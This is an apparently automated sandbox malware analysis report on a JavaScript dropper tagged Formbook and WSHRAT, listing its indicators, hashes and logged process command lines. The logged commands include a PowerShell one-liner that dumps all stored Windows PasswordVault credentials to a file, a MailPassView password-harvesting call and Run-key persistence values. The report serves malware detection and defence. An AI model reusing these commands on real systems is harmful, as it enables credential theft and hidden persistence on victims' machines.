Malware Analysis Report

2024-10-19 09:24

Sample ID 230808-mwcnradf21
Target Scan00516.js
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
Tags
formbook wshrat me15 persistence rat spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9

Threat Level: Known bad

The file Scan00516.js was found to be: Known bad.

Malicious Activity Summary

formbook wshrat me15 persistence rat spyware stealer trojan

WSHRAT

Formbook

NirSoft MailPassView

Formbook payload

Nirsoft

Blocklisted process makes network request

Drops startup file

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Script User-Agent

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-08 10:48

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-08 10:48

Reported

2023-08-08 10:51

Platform

win7-20230712-en

Max time kernel

45s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook payload

rat

NirSoft MailPassView

Nirsoft

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3408354897-1169622894-3874090110-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3408354897-1169622894-3874090110-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2144 set thread context of 1232 N/A C:\Users\Admin\AppData\Roaming\bin.exe C:\Windows\Explorer.EXE
PID 2960 set thread context of 1232 N/A C:\Windows\SysWOW64\help.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|701717DD|WGWIREOE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 8/8/2023|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\help.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1808 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 2896 wrote to memory of 2144 N/A C:\Windows\System32\wscript.exe C:\Users\Admin\AppData\Roaming\bin.exe
PID 1232 wrote to memory of 2960 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\help.exe
PID 2960 wrote to memory of 768 N/A C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\Scan00516.js

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Scan00516.js"

C:\Users\Admin\AppData\Roaming\bin.exe

"C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\SysWOW64\autoconv.exe

"C:\Windows\SysWOW64\autoconv.exe"

C:\Windows\SysWOW64\help.exe

"C:\Windows\SysWOW64\help.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\bin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Roaming\cmdc.exe

"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"

Network

Files

C:\Users\Admin\AppData\Roaming\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js

MD5 cceb6f7af35075d52fb1abbbcba9d552
SHA1 db1fb42b122d7dfe6870a9a5158cd16a54f500b9
SHA256 e65ec8d385c6ce480304b3ef59bcae22c5513e74394d0c4ddea7c3ce61bcc5a9
SHA512 694efc7c76eca5a222b811cb4f71cfe914f1206a316db65cbec9e947133f8b047ffb0f86f3f3552e398b4fd6f22ce54f7bb99971d4070ce8eb9a52d1f2cf20a5

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

memory/2144-68-0x0000000000810000-0x0000000000B13000-memory.dmp

memory/1232-70-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/2144-69-0x0000000000200000-0x0000000000215000-memory.dmp

memory/1232-72-0x0000000006C40000-0x0000000006DC0000-memory.dmp

memory/2144-71-0x0000000001180000-0x00000000011AF000-memory.dmp

memory/2144-74-0x0000000001180000-0x00000000011AF000-memory.dmp

memory/2144-75-0x0000000000280000-0x0000000000295000-memory.dmp

memory/1232-76-0x00000000068D0000-0x00000000069DE000-memory.dmp

memory/1232-79-0x0000000006C40000-0x0000000006DC0000-memory.dmp

memory/2960-78-0x0000000000B70000-0x0000000000B76000-memory.dmp

memory/2960-80-0x0000000000B70000-0x0000000000B76000-memory.dmp

memory/2960-81-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/2960-82-0x0000000000780000-0x0000000000A83000-memory.dmp

C:\Users\Admin\AppData\Roaming\bin.exe

MD5 788f57c9156b4733574dc253f76fe2e7
SHA1 51ec54fdbcc849bb2658f3f668610addb9fcb287
SHA256 14af70dcbf912475a041701493188d184d6c2fd4a0bb8f8c1e5a3a2660d30b0c
SHA512 18baae46f385e2c90435fe0d93214a9046f821ba1abd7a581603f14dc9bd7fb79d1f5599aeb14b10a99794fd8ebd544e354cc3421f8883d54c0958e51627c036

memory/2960-84-0x0000000000080000-0x00000000000AF000-memory.dmp

memory/1232-85-0x00000000068D0000-0x00000000069DE000-memory.dmp

memory/2960-87-0x0000000000690000-0x0000000000724000-memory.dmp

memory/1232-88-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/1232-89-0x00000000094C0000-0x0000000009615000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk.zip

MD5 d9a63dfd8b73629421bb44bcde09f312
SHA1 7855575c12eaee0e734f3901ca1da2931e9b587a
SHA256 9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb
SHA512 df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8

memory/1232-2680-0x00000000094C0000-0x0000000009615000-memory.dmp

memory/1232-9639-0x00000000094C0000-0x0000000009615000-memory.dmp

memory/2896-10567-0x000007FEFBD20000-0x000007FEFBD28000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk\Lib\SITE-P~1\adodbapi\test\is64bit.py

MD5 ca2cc8e73bbca371935bbc92ed18d567
SHA1 1adb458919e842cd78c72b1ff00e5e93cb6ef75e
SHA256 bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1
SHA512 b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223

memory/2260-23913-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23914-0x0000000002220000-0x0000000002228000-memory.dmp

memory/2260-23912-0x000000001B330000-0x000000001B612000-memory.dmp

memory/2260-23911-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

memory/2260-23915-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23916-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23917-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

memory/2260-23918-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2260-23920-0x000007FEF5780000-0x000007FEF611D000-memory.dmp

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\wshsdk\python.exe

MD5 e03cbf90f6ed0c8075e5092621555990
SHA1 18ced6a9659a87b7d1458cdb6ce8409219299fc1
SHA256 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9
SHA512 f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d

C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

\Users\Admin\AppData\Roaming\wshsdk\python37.dll

MD5 7f0b34248c228bebc731ef155b50bbff
SHA1 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44
SHA256 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578
SHA512 fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23

\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

C:\Users\Admin\AppData\Roaming\wshsdk\VCRUNTIME140.dll

MD5 ae96651cfbd18991d186a029cbecb30c
SHA1 18df8af1022b5cb188e3ee98ac5b4da24ac9c526
SHA256 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1
SHA512 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll

MD5 41a348f9bedc8681fb30fa78e45edb24
SHA1 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256 c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SHA512 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204

C:\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.DLL

MD5 d6326267ae77655f312d2287903db4d3
SHA1 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SHA512 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll

MD5 93d3da06bf894f4fa21007bee06b5e7d
SHA1 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256 f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SHA512 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 aec2268601470050e62cb8066dd41a59
SHA1 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SHA512 0c14d160bfa3ac52c35ff2f2813b85f8212c5f3afbcfe71a60ccc2b9e61e51736f0bf37ca1f9975b28968790ea62ed5924fae4654182f67114bd20d8466c4b8f

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll

MD5 6ea692f862bdeb446e649e4b2893e36f
SHA1 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SHA512 9661c135f50000e0018b3e5c119515cfe977b2f5f88b0f5715e29df10517b196c81694d074398c99a572a971ec843b3676d6a831714ab632645ed25959d5e3e7

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll

MD5 8d02dd4c29bd490e672d271700511371
SHA1 f3035a756e2e963764912c6b432e74615ae07011
SHA256 c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SHA512 d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll

MD5 8d02dd4c29bd490e672d271700511371
SHA1 f3035a756e2e963764912c6b432e74615ae07011
SHA256 c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SHA512 d44ef51d3aaf42681659fffff4dd1a1957eaf4b8ab7bb798704102555da127b9d7228580dced4e0fc98c5f4026b1bab242808e72a76e09726b0af839e384c3b0

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll

MD5 ac290dad7cb4ca2d93516580452eda1c
SHA1 fa949453557d0049d723f9615e4f390010520eda
SHA256 c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SHA512 b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll

MD5 849f2c3ebf1fcba33d16153692d5810f
SHA1 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SHA512 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll

MD5 a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1 116846ca871114b7c54148ab2d968f364da6142f
SHA256 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SHA512 e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll

MD5 8b0ba750e7b15300482ce6c961a932f0
SHA1 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256 bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SHA512 fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll

MD5 72e28c902cd947f9a3425b19ac5a64bd
SHA1 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SHA512 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll

MD5 fefb98394cb9ef4368da798deab00e21
SHA1 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256 b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SHA512 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8

\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4

C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll

MD5 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SHA512 da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4


Analysis: behavioral2

Detonation Overview

Submitted

2023-08-08 10:48

Reported

2023-08-08 10:51

Platform

win10v2004-20230703-en

Max time kernel

59s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

WSHRAT

trojan wshrat

Formbook payload

rat

NirSoft MailPassView


Nirsoft


Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan00516.js C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\bin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3195054982-4292022746-1467505928-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan00516 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Scan00516.js\"" C:\Windows\System32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
